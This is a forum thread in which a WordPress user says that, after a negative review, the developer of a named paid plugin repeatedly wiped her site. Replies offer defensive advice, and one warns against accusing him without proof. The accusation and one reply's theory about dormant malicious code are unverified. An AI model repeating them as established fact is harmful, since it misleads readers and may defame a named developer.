SitePoint Sponsor

User Tag List

Results 1 to 8 of 8
  1. #1
    SitePoint Member
    Join Date
    Jul 2012
    Posts
    9
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Question plugin developer who vents his anger by hacking into wordpress sites

    I'm posting this here because I'd like some feedback, and this subject isn't allowed anywhere on the WP Forum.

    After a lot of searching, I finally paid for a plugin that I really needed. I tried all the free versions, without success. The professional version looked well put together. It was expensive --$36 -- but it would have solved a lot of issues, so I paid the money. It is a well written plugin, but I did have a suggestion for the developer, so I went to the plugin homepage, and found that there is no way to get in touch with him unless you pay an additional almost $40 for six months of support. Every possible email link just dumps you back to the page where you have to pay for support. So even if you have a very basic question about installation, you're stuck unless you shell out more money. There is online documentation, but it is less than complete and often unclear. The developer is in Germany, and the site is available both in German and English. I speak German fluently, and read both versions, but there was no additional or clearer help on the German side of things.

    Tthis all strikes me as misleading advertising on the part of the developer. It would be better business practice to charge more for the plugin and include some kind of basic service. The way it works now, you pay your money and the door shuts in your face.

    So at this point I went onto the WP site to write a review for the plugin. I said there what I've said here -- well written, works the way its supposed to, too little documentation, and a really questionable support policy that verges on the unethical. The deveoper flagged my review, but the mod left a comment saying that the review was plain spoken, but not abusive.

    This is where the fun begins

    Within the hour, my WP installation had been hacked. The plugin in question, and all files and the mysql dbs associated with the plugin, disappeared. About three days worth of writing, images, etc., just gone. I did have a backup, and I retored. Within five hours the exact same thing happened. I called my hosting service -- bluehost.com -- and they helped me get things retored. They also strongly suggested SiteLock and other security measures. I reinstalled WP, and was in the process of setting up SiteLock when my whole directory was wiped clean. Everything, not just the WP installation, gone. Before you asked: I'm on a mac, but I scanned for malware and viruses anyway, and came up clean.

    The support person at bluehost.com was pretty impressed by this hacker's determination to teach me a lesson.

    All the rest of the directory restored without a problem, but the WP installation is proving more difficult. Trying to start over from scratch and do a clean install, I ran into errors that the bluehost people are looking at now. It may be a long time before I get this all working again, and at this point I think I lhave ost those three days of work for good.

    I went back to my WP Forum review of the plugin and added some information about what had happened. The mod deleted everything. Because it's a plugin you pay for, you can't discuss it anywhere on that forum. You can't warn people about the business practices, you can't ask if anyone else has had similar experiences. I would have liked to send the mod a private message with information from bluehost which makes it clear that the plugin developer in question is the person who did all this with what the bluehost support person said was almost a hundred percent certainty. But you can't private message mods, or at least, I can't see a way to do it.

    The internet is still very much the wild west, and I know there's nothing I can do to the developer. He's in Germany. There's no agency that will go after him, so he's free to hack away at me because I dared to point out a problem with his business practices. This is actually something that impacts on my living, as social marketing is crucial to publishing fiction these days. But it seems there should be some kind of central database where people could leave reviews. Now I've written down the whole story. Maybe I'll be able to get back to work and start reconstructing the mess I paid $36 for. The plugin, because you will be wondering, is Encyclopedia Pro.

  2. #2
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,258
    Mentioned
    196 Post(s)
    Tagged
    2 Thread(s)
    Wow! I'd rather spend an hour of my own time writing my own plugin than pay that much for something like that to happen.

    So you're saying that after you restored your site using backups, with that plugin removed, you're site was again soon non-functional?

  3. #3
    SitePoint Member
    Join Date
    Jul 2012
    Posts
    9
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Unfortunately I don't have the skills to write even a simple plugin on my own, and in fact I don't mind paying somebody who does good work. But this is clearly someone who is willing to go to great lengths for revenge. And yes, the site is still non functional. They haven't figured out why, yet. I find it disturbing that there's no way to warn people about this kind of behavior.

  4. #4
    From space with love silver trophy
    SpacePhoenix's Avatar
    Join Date
    May 2007
    Location
    Poole, UK
    Posts
    5,072
    Mentioned
    103 Post(s)
    Tagged
    0 Thread(s)
    Change your FTP passwords ASAP just in-case the person has knowledge of them. If that plugin was using a separate MySQL user, from the main Wordpress install, disable or delete that MySQL user that the plugin was using. If you wasn't getting any other traffic from the person's IP address, maybe ask your host if they could deny access to your site from that person's IP address
    Community Team Advisor
    Forum Guidelines: Posting FAQ Signatures FAQ Self Promotion FAQ
    Help the Mods: What's Fluff? Report Fluff/Spam to a Moderator

  5. #5
    SitePoint Member
    Join Date
    Jul 2012
    Posts
    9
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thank you, SpacePhoenix, for the good suggestions. All passwords -- ftp, mysql, wordpress, cpanel -- were changed after the second hacking incident. The mysql databases were deleted entirely.

    Maybe I should change the passwords again, just to be sure.

    I just don't understand someone who would go to the time and trouble to do all this.

  6. #6
    SitePoint Wizard
    Join Date
    Oct 2005
    Posts
    1,850
    Mentioned
    5 Post(s)
    Tagged
    1 Thread(s)
    Have you examined your logs to see how you are being attacked and where the IP address of the attacker is coming from? If you are being hacked by the plugin developer, some sort of back door should be evident in the code, or something clearly obfuscated to make it difficult to determine what is happening. Did you look at the PHP code of the plugin? Did you try reinstalling without the plugin and see if you still get hacked?

  7. #7
    SitePoint Addict
    Join Date
    Oct 2008
    Location
    Virtual World is my location
    Posts
    316
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    You should check if any of the code looks weird in the plugin like some obscured code or some code which somehow has some link to some IP / developers website. If the developer has really done that, all people having paid plugins should be really a worried lot, because paid plugins come directly from the developer rather than via wordpress repository. What this means is there are no checks of any sort for these plugins. A developer could create a wonderful free plugin and put it on the wordpress repository. Then for some basic required features they could say you need to purchase a plugin. That could even contain malicious code which stays dormant but incase you face any issue and raise a complaint the developer could remotely modify the site. This also means that its a bug / security loop hole being made available via wordpress. This means even wordpress developers should take note of this issue because if a plugin developer is able to wipe out an entire website remotely (not just the plugin folder) but other folders of wordpress installation this is a huge security loophole left out by wordpress developers. Thank you very much for bringing out this issue and hopefully someone will take note of it.
    FreelanceNext.com - Freelance Projects / Jobs & more...
    BargainNext.com - coupons / deals / bargains / offers & more...

  8. #8
    SitePoint Wizard bronze trophy
    Join Date
    Oct 2004
    Location
    UK
    Posts
    2,676
    Mentioned
    10 Post(s)
    Tagged
    0 Thread(s)
    Personally as soon as I noticed the guy provides no direct method of contact, I would not have purchased the plugin in the first place. Seriously, how do you ask him pre-sales questions, there's not even a contact form? As for the support issue, TBH that's very clear on his site - the standard license is just for a year of updates, no support. Yes that's a rubbish policy but it's not hidden so I wouldn't agree with your claim that it's 'unethical'; if he choses to provide no free support that's his decision (as long as he states this before purchasing, which he does).

    FYI, if you do need to contact him, he does have a contact email in his whois records plus a mailing address on his site. Regarding the hacking, I would be very careful about accusing the developer of any involvement until you have solid proof.
    Disclaimer: I am not a lawyer and as such my posts and opinions should not be taken as legal advice.


Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •